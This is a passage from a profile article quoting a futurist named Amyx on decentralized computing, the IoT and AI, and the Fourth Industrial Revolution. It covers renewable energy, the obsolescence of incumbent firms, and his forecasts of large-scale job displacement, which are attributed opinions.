In addition to the symbiotic relationship between the IoT, AI, and data science is the shift to distributed and decentralized computing networks. “Let me give two examples,” Amyx continued. “Network TV stations such as NBC, ABC, and CBS represented the one-to-many paradigm that provided a centralized means of distributing content to the masses. Today, we’ve moved beyond networks and cables to real-time streaming and user-generated content in a many-to-many content creation and distribution model.”

Similarly, in the world of computing and data, we are seeing a shift from centralized to decentralized. Not only are data being generated on decentralized IoT devices, but they are also being stored and processed locally (known as “wild fog”). Specialized AI chips are enabling decentralized machines and gadgets to run AI algorithms locally without ever needing to make API calls, as well as Lambda functions in Amazon Web Services, which allow for computing without servers and without back-and-forth traffic to process, store, or disseminate.

“We are beginning to access distributed computational power, memory, storage, bandwidth, and features of edge devices to perform jobs. This has huge implications for telecom business models, cloud computing giants, privacy, data ownership, and security, with rippling effects even to how we govern our society or aggregate citizen preferences to cryptocurrency,” he continued. “IoT, AI, and blockchain all work in unison to create a world that will become hyper-connected, where every action and inaction will be quantified down to the iota. Truly the Matrix, minus the human batteries.”

An age of revolution

In terms of economic and social impact, the Fourth Industrial Revolution may be bigger and more disruptive than the first three combined. But this is about much more than just applying today’s technology to industries. It’s about integrating intelligent cyber-physical systems such as AI and machine learning to neural networks and deep learning, IoT, or even advanced materials such as graphene and new forms of energy and battery storage to leapfrog competitors and create business models and processes that were not possible before.

“Taking the example of renewable energy,” Amyx explains, “it is using exponential technologies to lower the CapEx and OpEx, quantify every facet of the value chain, automate processes, and substantially increase the output of renewable energy to usable electricity on a massive scale. In the process of fundamentally creating an entirely new ecosystem, there will be multi-billion-dollar startup opportunities, from next-gen CSP companies to new forms of liquified energy.”

Amyx refers to liquid hydrogen and ammonia as fuels that store renewable energy and make it easier to export it around the globe. “We are talking about advanced commercial fuel cells and industry batteries with a larger capacity than Tesla’s Powerpacks (greater than 100 to 200 kWh while costing $2.13 to $2.51 per Wh). We’re also talking about energy harvesting and wireless power transfer technologies to help our cities and homes be completely cord-free and the aboveground space infrastructure-free.”

In Amyx’s words, when you apply this type of transformation to each sector or industry, what you get is nothing short of multi-billion to multi-trillion-dollar opportunities. “Many of today’s Fortune 500 companies (and midcaps and SMB’s) are resistant to change and will become obsolete, or be acquired, or go private just to go bankrupt and be sold in pieces or die a slow death because their management and employees can’t imagine a world that’s different from the framework that they operate in today. Replacing them will be the startups of the future that will harness the power of AI, robotics, and other exponential technologies to fundamentally change both the game and the way the game is played.”

Our place in the future

Amyx thinks it’s important to understand that the fourth and subsequent Industrial Revolutions will be both good and bad. And, in his words, it mostly depends on which segments of the population that we focus on. “As we have seen across industries, technology is about driving down costs. Over time, in everything from genome sequencing to hard drives, the marginal cost drops down to a tiny fraction of what it used to be. This is a major benefit to society,” he clarifies.

“Moreover, these disruptions will also create unimaginable new industries and jobs that we can’t begin to fathom today. Who would have thought a decade ago that Snapchat, an AR photo filter, or chat app would be worth billions of dollars and employ engineers to create AR filters for selfies? But there are downsides.”

Amyx discussed this in The Human Race: How Humans Can Survive in the Robotic Age, his second book, in which he explores the imminent net job loss from artificial intelligence, robotics, and the Fourth Industrial Revolution and its impact on income inequality across the globe. “AI-driven cyber-physical automation is expected to displace 50% to 80% of the human workforce by 2030. As the pace of convergence of exponential technologies reaches a near vertical slope, the trend of human displacement is unstoppable,” he stated in his book.

But with the revolution come opportunities, too. We are facing a new era of advancement where connectivity is within the sight of development. As we move towards automation, we must be prepared to adapt to innovation. This, Amyx thinks, entails pursuing job training and labor force development in human-to-human services that leverage our ability to empathize with the human condition. After all, even in the age of technology, when we are the witnesses of change, empathy business models and services will become the bedrock of post-Fourth Industrial Revolution.